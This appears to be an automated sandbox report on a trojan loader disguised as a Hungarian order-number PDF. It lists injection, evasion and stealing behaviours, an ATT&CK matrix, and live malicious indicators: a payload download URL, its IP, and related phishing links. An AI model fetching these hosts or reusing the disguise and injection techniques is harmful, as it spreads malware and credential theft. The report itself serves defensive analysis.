            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335916CF mov eax, dword ptr fs:[00000030h]5_2_335916CF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B6C0 mov eax, dword ptr fs:[00000030h]5_2_3356B6C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B6C0 mov eax, dword ptr fs:[00000030h]5_2_3356B6C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B6C0 mov eax, dword ptr fs:[00000030h]5_2_3356B6C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B6C0 mov eax, dword ptr fs:[00000030h]5_2_3356B6C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B6C0 mov eax, dword ptr fs:[00000030h]5_2_3356B6C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B6C0 mov eax, dword ptr fs:[00000030h]5_2_3356B6C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361F6C7 mov eax, dword ptr fs:[00000030h]5_2_3361F6C7
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336216CC mov eax, dword ptr fs:[00000030h]5_2_336216CC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336216CC mov eax, dword ptr fs:[00000030h]5_2_336216CC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336216CC mov eax, dword ptr fs:[00000030h]5_2_336216CC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336216CC mov eax, dword ptr fs:[00000030h]5_2_336216CC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F36EE mov eax, dword ptr fs:[00000030h]5_2_335F36EE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F36EE mov eax, dword ptr fs:[00000030h]5_2_335F36EE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F36EE mov eax, dword ptr fs:[00000030h]5_2_335F36EE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F36EE mov eax, dword ptr fs:[00000030h]5_2_335F36EE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F36EE mov eax, dword ptr fs:[00000030h]5_2_335F36EE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F36EE mov eax, dword ptr fs:[00000030h]5_2_335F36EE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358D6E0 mov eax, dword ptr fs:[00000030h]5_2_3358D6E0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358D6E0 mov eax, dword ptr fs:[00000030h]5_2_3358D6E0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E368C mov eax, dword ptr fs:[00000030h]5_2_335E368C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E368C mov eax, dword ptr fs:[00000030h]5_2_335E368C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E368C mov eax, dword ptr fs:[00000030h]5_2_335E368C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E368C mov eax, dword ptr fs:[00000030h]5_2_335E368C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335576B2 mov eax, dword ptr fs:[00000030h]5_2_335576B2
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335576B2 mov eax, dword ptr fs:[00000030h]5_2_335576B2
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335576B2 mov eax, dword ptr fs:[00000030h]5_2_335576B2
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355D6AA mov eax, dword ptr fs:[00000030h]5_2_3355D6AA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355D6AA mov eax, dword ptr fs:[00000030h]5_2_3355D6AA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359B570 mov eax, dword ptr fs:[00000030h]5_2_3359B570
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359B570 mov eax, dword ptr fs:[00000030h]5_2_3359B570
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360B550 mov eax, dword ptr fs:[00000030h]5_2_3360B550
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360B550 mov eax, dword ptr fs:[00000030h]5_2_3360B550
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360B550 mov eax, dword ptr fs:[00000030h]5_2_3360B550
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B562 mov eax, dword ptr fs:[00000030h]5_2_3355B562
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360F525 mov eax, dword ptr fs:[00000030h]5_2_3360F525
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360F525 mov eax, dword ptr fs:[00000030h]5_2_3360F525
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360F525 mov eax, dword ptr fs:[00000030h]5_2_3360F525
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360F525 mov eax, dword ptr fs:[00000030h]5_2_3360F525
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360F525 mov eax, dword ptr fs:[00000030h]5_2_3360F525
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360F525 mov eax, dword ptr fs:[00000030h]5_2_3360F525
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360F525 mov eax, dword ptr fs:[00000030h]5_2_3360F525
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361B52F mov eax, dword ptr fs:[00000030h]5_2_3361B52F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33635537 mov eax, dword ptr fs:[00000030h]5_2_33635537
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33597505 mov eax, dword ptr fs:[00000030h]5_2_33597505
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33597505 mov ecx, dword ptr fs:[00000030h]5_2_33597505
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356D534 mov eax, dword ptr fs:[00000030h]5_2_3356D534
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356D534 mov eax, dword ptr fs:[00000030h]5_2_3356D534
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356D534 mov eax, dword ptr fs:[00000030h]5_2_3356D534
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356D534 mov eax, dword ptr fs:[00000030h]5_2_3356D534
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356D534 mov eax, dword ptr fs:[00000030h]5_2_3356D534
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356D534 mov eax, dword ptr fs:[00000030h]5_2_3356D534
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359D530 mov eax, dword ptr fs:[00000030h]5_2_3359D530
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359D530 mov eax, dword ptr fs:[00000030h]5_2_3359D530

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe NtQueryValueKey: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: NULL target: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: NULL target: C:\Windows\SysWOW64\sdchange.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Process created: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
            Source: SkCSKJeVGx.exe, 00000006.00000002.2971934184.0000000001391000.00000002.00000001.00040000.00000000.sdmp, SkCSKJeVGx.exe, 00000006.00000000.2855426804.0000000001391000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: SkCSKJeVGx.exe, 00000006.00000002.2971934184.0000000001391000.00000002.00000001.00040000.00000000.sdmp, SkCSKJeVGx.exe, 00000006.00000000.2855426804.0000000001391000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: SkCSKJeVGx.exe, 00000006.00000002.2971934184.0000000001391000.00000002.00000001.00040000.00000000.sdmp, SkCSKJeVGx.exe, 00000006.00000000.2855426804.0000000001391000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: SkCSKJeVGx.exe, 00000006.00000002.2971934184.0000000001391000.00000002.00000001.00040000.00000000.sdmp, SkCSKJeVGx.exe, 00000006.00000000.2855426804.0000000001391000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359

            Stealing of Sensitive Information

            Source: Yara match File source: 00000007.00000002.2971931474.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2968077635.0000000033220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.2971855670.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.2972278364.0000000002B40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2968622258.0000000033880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            Source: Yara match File source: 00000007.00000002.2971931474.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2968077635.0000000033220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.2971855670.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.2972278364.0000000002B40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2968622258.0000000033880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 112 Process Injection | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Clipboard Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 1 Access Token Manipulation | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 112 Process Injection | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 23 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Source | Detection | Scanner | Label | Link
            Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe | 8% | ReversingLabs | |
            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\nso4347.tmp\LangDLL.dll | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll | 3% | ReversingLabs | |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            http://enechado.ru.com/tk.binH | 0% | Avira URL Cloud | safe |
            http://enechado.ru.com/tk.bin | 100% | Avira URL Cloud | malware |
            http://enechado.ru.com/tk.binK | 0% | Avira URL Cloud | safe |
            http://enechado.ru.com/tk.binR | 0% | Avira URL Cloud | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            enechado.ru.com | 103.83.194.50 | true | false | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            http://enechado.ru.com/tk.bin | false | Avira URL Cloud: malware | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.00000000005F2000.00000020.00000001.01000000.00000009.sdmp | false | | high
            http://www.ftp.ftp://ftp.gopher. | Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.0000000000649000.00000020.00000001.01000000.00000009.sdmp | false | | high
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.00000000005F2000.00000020.00000001.01000000.00000009.sdmp | false | | high
            http://enechado.ru.com/tk.binR | Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945021346.00000000033A8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://nsis.sf.net/NSIS_ErrorError | Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe | false | | high
            http://enechado.ru.com/tk.binH | Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945021346.00000000033E5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.0000000000649000.00000020.00000001.01000000.00000009.sdmp | false | | high
            http://enechado.ru.com/tk.binK | Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945021346.00000000033A8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                        103.83.194.50 | enechado.ru.com | United States | | 132335 | NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN | false
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1562190
                        Start date and time:2024-11-25 10:25:06 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 37s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:7
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                        renamed because original name is a hash value
                        Original Sample Name:Rendelsi szm 11-2024-pdf.bat.exe
                        Detection:MAL
                        Classification:mal84.troj.evad.winEXE@5/9@2/1
                        EGA Information:
                        • Successful, ratio: 75%
                        HCA Information:
                        • Successful, ratio: 78%
                        • Number of executed functions: 72
                        • Number of non-executed functions: 304
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                        No simulations
                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                        103.83.194.50 | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | malicious | FormBook, GuLoader | enechado.ru.com/tk.bin
                         | ZAM#U00d3WIENIE nr 594uzzf485-pdf.exe | malicious | GuLoader | passion4dance.ru.com/POL.bin
                         | ZAM#U00d3WIENIE nr 594uzzf485-pdf.exe | malicious | GuLoader | passion4dance.ru.com/POL.bin
                         | CONTRACT-pdf.exe | malicious | AgentTesla | passion4dance.ru.com/qa.bin
                         | WTsvUl9X8N.exe | malicious | Oski Stealer, Vidar | 9entrevera.sa.com/o/
                         | SecuriteInfo.com.Win32.SuspectCrc.30843.5697.exe | malicious | GuLoader | insula.sa.com/sgp/xkxkBkUGnvBunHoZmLt35.bin
                         | doc_order_sheet_sn8577THC_13122023_pdf_0000000.vbs | malicious | GuLoader, Remcos | ytgz5.sa.com/gBuCeYv217.bin
                         | awb_dhl_shipping_documents_PL&BL_13122023_pdf000000000000000000000000000000000.vbs | malicious | GuLoader, Remcos | ytgz5.sa.com/KaIWGuoaPXGhlzSd30.bin
                         | PmX1jHdUnS.exe | malicious | Oski Stealer, Vidar | 9enternecera.ru.com/os/
                         | REF#117300-100823.xlam.xlsx | malicious | Unknown | sandiisells.com/.well-known/acme-challenge/cx/raf.vbs
                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                        enechado.ru.com | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | malicious | FormBook, GuLoader | 103.83.194.50
                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                        NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | malicious | FormBook, GuLoader | 103.83.194.50
                         | https://recociese.za.com/wpcones/excel.html | malicious | Unknown | 103.83.194.50
                         | LPC Scanned Docs-Copyright #U00a9GNP.CPL.dll | malicious | AsyncRAT | 103.83.194.50
                         | 08cb9f0ed370a2daea9dc05fa08aedc2a10b1615.html | malicious | Unknown | 103.83.194.55
                         | sora.m68k.elf | malicious | Mirai | 168.81.254.150
                         | Reminders for Msp-partner_ Server Alert.eml | malicious | HTMLPhisher | 103.83.194.55
                         | CARDFACTORYAccess Program, Tuesday, October 29, 2024.eml | malicious | HTMLPhisher | 103.83.194.55
                         | https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Ffairwaygilbert.com%2Fnew%2FdtMyxOyre1WJ8xvj5DnN7kDa/Y2hyaXMuaGF3a2luc0BwZXJyeWhvbWVzLmNvbQ== | malicious | Tycoon2FA | 103.83.194.5
                         | https://url.avanan.click/v2/r01/___https://drickly-com-dot-fluid-dreamer-410607.uc.r.appspot.com/?h=66LVKOwLflbMjYVoJBNTrXiW3CEpoRg_EafL_ygpoXil&fru;v=755/8c88*~*9&fru;w=6c5ghgij98cg/ffg&fru;E=6a766/89b55*~*9&fru;t=myyue8Fe7Ke7KBBB.lttlqj.htr.xle7Kzwqe8Kxfe8Iye7*~*jxwhe8I3ZR/bSIze7*~*xtzwhje8Ie7*~*whye8I859Oe7*~*e7*~*hie8I7/*~*Ize7*~*zfhye7*~*zwqe8Ifrue7Kxe7KfwrxywtslxyjjqBtwp.htrd.fnlzD___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzo3NDhmM2FkMWRiOWU2YTNlMjE1YzgwMzRjMTliODRkZDo3OmNmNmI6NjYyMTE5OWZiNzU5MjU0NTE1ZjgzODM0ZWRlYjRmZDIwOWJmNTQ3YWUwY2MxNmU5NjFiZmExYjYzM2U0YzA0MzpoOlQ6VA#YmJyYWNleUBwcmVzaWRpby5jb20= | malicious | Unknown | 103.83.194.55
                         | https://url.avanan.click/v2/r01/___https://www.google.com.sg/zwq?v=7WZIz&fru;why=7WZIz&fru;xf=y&fru;jxwh=7WZIz&fru;xtzwhj=&fru;hi=7WZIz&fru;zfhy=&fru;zwq=frudxdgtqiqntsfuufwjq.htrd.n___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpkZGUwNjUwMWZkNDExNDYwNzZjMDZiMzcyYTg5ZmU1NDo3OjE4NDg6ZGQ5NzQ2M2JkZmJmZTM2MDBmOTU2MjU4MWJhNWIyZDA0ODAzMGI4MzllZGM2ZjkzYmIwZjc2YWQ5ZmQ2MDFhNTpoOlQ6VA#ZWphbWVzQGVuY2luYWNhcGl0YWwuY29t | malicious | HTMLPhisher | 103.83.194.55
                        No context
                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                        C:\Users\user\AppData\Local\Temp\nso4347.tmp\LangDLL.dll | Readouts.bat.exe | malicious | GuLoader |
                         | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | malicious | FormBook, GuLoader |
